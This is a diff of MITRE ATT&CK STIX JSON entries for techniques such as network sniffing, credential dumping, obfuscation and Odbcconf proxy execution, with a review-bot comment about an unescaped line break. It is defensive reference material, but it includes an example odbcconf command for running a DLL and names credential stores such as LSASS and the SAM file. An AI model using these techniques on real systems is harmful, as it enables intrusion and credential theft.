- "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nIn cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be sufficient due to benign use during normal operations.",
"x_mitre_platforms": [
"macOS",
"Windows",
@@ -17185,19 +17849,32 @@
"Azure",
"Linux"
],
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nIn cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be sufficient due to benign use during normal operations.",
+ "x_mitre_data_sources": [
+ "Process monitoring",
+ "Process command-line parameters",
+ "Network protocol analysis",
+ "Process use of network"
],
- "x_mitre_contributors": [
- "Praetorian"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "2.1"
},
{
- "id": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Network Sniffing",
- "description": "Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n\nData captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.\n\nNetwork sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.",
+ "created": "2017-05-31T21:30:41.399Z",
+ "modified": "2020-03-25T21:03:49.610Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "credential-access"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "discovery"
+ }
+ ],
+ "type": "attack-pattern",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -17210,22 +17887,10 @@
"url": "https://capec.mitre.org/data/definitions/158.html"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "credential-access"
- },
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "discovery"
- }
- ],
- "modified": "2020-03-25T21:03:49.610Z",
- "created": "2017-05-31T21:30:41.399Z",
+ "description": "Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n\nData captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.\n\nNetwork sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.",
+ "name": "Network Sniffing",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "id": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529",
"x_mitre_version": "1.1",
"x_mitre_data_sources": [
"Network device logs",
@@ -17327,10 +17992,14 @@
],
"modified": "2020-03-11T15:09:26.624Z",
"created": "2017-05-31T21:31:10.728Z",
- "x_mitre_version": "2.0",
- "x_mitre_contributors": [
- "Ryan Becwar"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows",
+ "Linux",
+ "macOS"
],
+ "x_mitre_network_requirements": true,
+ "x_mitre_detection": "Analyze network traffic for ICMP messages or other protocols that contain abnormal data or are not normally seen within or exiting the network.\n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)\n\nMonitor and investigate API calls to functions associated with enabling and/or utilizing alternative communication channels.",
"x_mitre_data_sources": [
"Host network interface",
"Netflow/Enclave netflow",
@@ -17339,14 +18008,10 @@
"Packet capture",
"Process use of network"
],
- "x_mitre_detection": "Analyze network traffic for ICMP messages or other protocols that contain abnormal data or are not normally seen within or exiting the network.\n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)\n\nMonitor and investigate API calls to functions associated with enabling and/or utilizing alternative communication channels.",
- "x_mitre_network_requirements": true,
- "x_mitre_platforms": [
- "Windows",
- "Linux",
- "macOS"
+ "x_mitre_contributors": [
+ "Ryan Becwar"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "2.0"
},
{
"external_references": [
@@ -17387,23 +18052,23 @@
],
"modified": "2020-03-14T23:39:50.117Z",
"created": "2020-03-14T23:39:50.117Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
],
+ "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
"x_mitre_data_sources": [
"Packet capture",
"Process use of network",
"Process monitoring",
"Network protocol analysis"
],
- "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -17444,20 +18109,20 @@
],
"modified": "2020-03-26T22:02:25.221Z",
"created": "2020-03-14T18:18:32.443Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_detection": "Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2)",
"x_mitre_data_sources": [
"Process monitoring",
"Process use of network",
"Netflow/Enclave netflow",
"Packet capture"
],
- "x_mitre_detection": "Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2)",
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"id": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
@@ -17526,31 +18191,31 @@
"phase_name": "credential-access"
}
],
- "modified": "2020-03-25T16:25:16.928Z",
+ "modified": "2020-06-09T20:46:00.758Z",
"created": "2017-05-31T21:30:19.735Z",
- "x_mitre_version": "2.0",
- "x_mitre_contributors": [
- "Vincent Le Toux",
- "Ed Williams, Trustwave, SpiderLabs"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows",
+ "Linux",
+ "macOS"
],
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM",
+ "root"
+ ],
+ "x_mitre_detection": "### Windows\nMonitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.\n\nHash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well. \n\nOn Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.\n\nMonitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like [Mimikatz](https://attack.mitre.org/software/S0002). [PowerShell](https://attack.mitre.org/techniques/T1086) scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module, (Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.\n\nMonitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync. 
(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Note: Domain controllers may not log replication requests originating from the default domain controller account. (Citation: Harmj0y DCSync Sept 2015). Also monitor for network protocols (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests (Citation: Microsoft SAMR) from IPs not associated with known domain controllers. (Citation: AdSecurity DCSync Sept 2015)\n\n### Linux\nTo obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path /proc//maps, where the directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.",
"x_mitre_data_sources": [
"API monitoring",
"Process monitoring",
"PowerShell logs",
"Process command-line parameters"
],
- "x_mitre_detection": "### Windows\nMonitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.\n\nHash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well. \n\nOn Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.\n\nMonitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like [Mimikatz](https://attack.mitre.org/software/S0002). [PowerShell](https://attack.mitre.org/techniques/T1086) scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module, (Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.\n\nMonitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync. 
(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Note: Domain controllers may not log replication requests originating from the default domain controller account. (Citation: Harmj0y DCSync Sept 2015). Also monitor for network protocols (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests (Citation: Microsoft SAMR) from IPs not associated with known domain controllers. (Citation: AdSecurity DCSync Sept 2015)\n\n### Linux\nTo obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path /proc//maps, where the directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.",
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM",
- "root"
+ "x_mitre_contributors": [
+ "Vincent Le Toux",
+ "Ed Williams, Trustwave, SpiderLabs"
],
- "x_mitre_platforms": [
- "Windows",
- "Linux",
- "macOS"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "2.0"
},
{
"external_references": [
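Review bot: The `x_mitre_detection` value on the new side of this hunk breaks across two physical lines after `DCSync. ` with no `+` marker on the continuation, and the removed copy shows the same break, which points to an unescaped line-breaking character inside the JSON string rather than a wrapped diff line. If that character is a raw U+000A the file is not valid RFC 8259 JSON and a strict parser rejects the entire bundle; if it is U+2028 or U+2029 the document parses but the character should be escaped as `\u2028` before the text is embedded in HTML or JavaScript. Worth confirming with a strict parser such as `python -m json.tool` on the regenerated file rather than assuming the upstream export is clean. The enclosing `attack-pattern` object starts outside the hunk.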
@@ -17596,23 +18261,23 @@
],
"modified": "2020-03-29T01:43:29.320Z",
"created": "2020-02-20T15:27:18.581Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_impact_type": [
+ "Availability"
],
+ "x_mitre_detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.",
"x_mitre_data_sources": [
"Network device logs",
"Netflow/Enclave netflow",
"Network intrusion detection system",
"SSL/TLS inspection"
],
- "x_mitre_detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.",
- "x_mitre_impact_type": [
- "Availability"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"object_marking_refs": [
@@ -17670,7 +18335,7 @@
"source_name": "GitHub Office-Crackros Aug 2016"
}
],
- "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. \n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as JavaScript. \n\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)\n\nAdversaries may also obfuscate commands executed from payloads or directly via a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and whitelisting mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) ",
+ "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. \n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as JavaScript. \n\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)\n\nAdversaries may also obfuscate commands executed from payloads or directly via a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) ",
"name": "Obfuscated Files or Information",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"id": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
@@ -17681,22 +18346,13 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T21:03:09.892Z",
+ "modified": "2020-06-20T22:14:08.350Z",
"created": "2017-05-31T21:30:32.662Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_detection": "Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system). \n\nFlag and analyze commands containing indicators of obfuscation and known suspicious syntax such as uninterpreted escape characters like '''^''' and '''\"'''. Windows' Sysmon and Event ID 4688 displays command-line arguments for processes. Deobfuscation tools can be used to detect these indicators in files/payloads. (Citation: GitHub Revoke-Obfuscation) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: GitHub Office-Crackros Aug 2016) \n\nObfuscation used in payloads for Initial Access can be detected at the network. Use network intrusion detection systems and email gateway filtering to identify compressed and encrypted attachments and scripts. Some email attachment detonation systems can open compressed and encrypted attachments. Payloads delivered over an encrypted connection from a website require encrypted network traffic inspection. \n\nThe first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network. ",
- "x_mitre_defense_bypassed": [
- "Host forensic analysis",
- "Signature-based detection",
- "Host intrusion prevention systems",
- "Application whitelisting",
- "Process whitelisting",
- "Log analysis",
- "Whitelisting by file name or path"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "1.1",
+ "x_mitre_contributors": [
+ "Red Canary",
+ "Christiaan Beek, @ChristiaanBeek"
],
"x_mitre_data_sources": [
"Network protocol analysis",
@@ -17712,16 +18368,24 @@
"Email gateway",
"SSL/TLS inspection"
],
- "x_mitre_contributors": [
- "Red Canary",
- "Christiaan Beek, @ChristiaanBeek"
+ "x_mitre_defense_bypassed": [
+ "Host forensic analysis",
+ "Signature-based detection",
+ "Host intrusion prevention systems",
+ "Application control",
+ "Log analysis",
+ "Application control by file name or path"
],
- "x_mitre_version": "1.1",
- "x_mitre_is_subtechnique": false
+ "x_mitre_detection": "Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system). \n\nFlag and analyze commands containing indicators of obfuscation and known suspicious syntax such as uninterpreted escape characters like '''^''' and '''\"'''. Windows' Sysmon and Event ID 4688 displays command-line arguments for processes. Deobfuscation tools can be used to detect these indicators in files/payloads. (Citation: GitHub Revoke-Obfuscation) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: GitHub Office-Crackros Aug 2016) \n\nObfuscation used in payloads for Initial Access can be detected at the network. Use network intrusion detection systems and email gateway filtering to identify compressed and encrypted attachments and scripts. Some email attachment detonation systems can open compressed and encrypted attachments. Payloads delivered over an encrypted connection from a website require encrypted network traffic inspection. \n\nThe first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network. ",
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"id": "attack-pattern--6e3bd510-6b33-41a4-af80-2d80f3ee0071",
- "description": "Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) Odbcconf.exe is digitally signed by Microsoft.\n\nAdversaries may abuse odbcconf.exe to bypass application whitelisting solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR \"C:\\Users\\Public\\file.dll\"}). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) \n",
+ "description": "Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) Odbcconf.exe is digitally signed by Microsoft.\n\nAdversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR \"C:\\Users\\Public\\file.dll\"}). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) \n",
"name": "Odbcconf",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -17761,32 +18425,40 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T17:01:32.793Z",
+ "modified": "2020-06-20T22:39:00.717Z",
"created": "2020-01-24T15:01:32.917Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_platforms": [
+ "Windows"
],
- "x_mitre_defense_bypassed": [
- "Digital Certificate Validation",
- "Application whitelisting"
- ],
- "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of odbcconf.exe. Compare recent invocations of odbcconf.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of odbcconf.exe may also be useful in determining the origin and purpose of the DLL being loaded.",
"x_mitre_data_sources": [
"Loaded DLLs",
"Process command-line parameters",
"Process monitoring"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of odbcconf.exe. Compare recent invocations of odbcconf.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of odbcconf.exe may also be useful in determining the origin and purpose of the DLL being loaded.",
+ "x_mitre_defense_bypassed": [
+ "Digital Certificate Validation",
+ "Application control"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
- "id": "attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Office Application Startup",
- "description": "Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.\n\nA variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)",
+ "created": "2017-12-14T16:46:06.044Z",
+ "modified": "2020-06-25T17:48:09.417Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "persistence"
+ }
+ ],
+ "type": "attack-pattern",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -17824,18 +18496,10 @@
"description": "SensePost. (2017, September 21). NotRuler - The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange. Retrieved February 4, 2019."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "persistence"
- }
- ],
- "modified": "2020-03-26T17:36:16.211Z",
- "created": "2017-12-14T16:46:06.044Z",
+ "description": "Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.\n\nA variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)",
+ "name": "Office Application Startup",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "id": "attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53",
"x_mitre_is_subtechnique": false,
"x_mitre_version": "1.2",
"x_mitre_contributors": [
@@ -17911,7 +18575,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Office Template Macros",
- "description": "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template)\n\nOffice Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can be inserted into the base template and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded.(Citation: enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates may also be stored and pulled from remote locations.(Citation: GlobalDotName Jun 2019) \n\nWord Normal.dotm location:C:\\Users\\\\(username)\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\n\nExcel Personal.xlsb location:C:\\Users\\\\(username)\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\PERSONAL.XLSB\n\nAdversaries may also change the location of the base template to point to their own by hijacking the application's search order, e.g. Word 2016 will first look for Normal.dotm under C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\, or by modifying the GlobalDotName registry key. By modifying the GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to use for the template that will be loaded on application startup. 
To abuse GlobalDotName, adversaries may first need to register the template as a trusted document or place it in a trusted location.(Citation: GlobalDotName Jun 2019) \n\nAn adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.",
